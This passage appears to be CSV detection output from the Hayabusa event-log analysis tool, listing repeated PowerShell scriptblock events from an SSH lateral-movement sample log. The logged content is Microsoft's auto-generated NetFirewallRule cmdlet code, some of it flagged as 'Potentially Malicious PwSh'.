($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 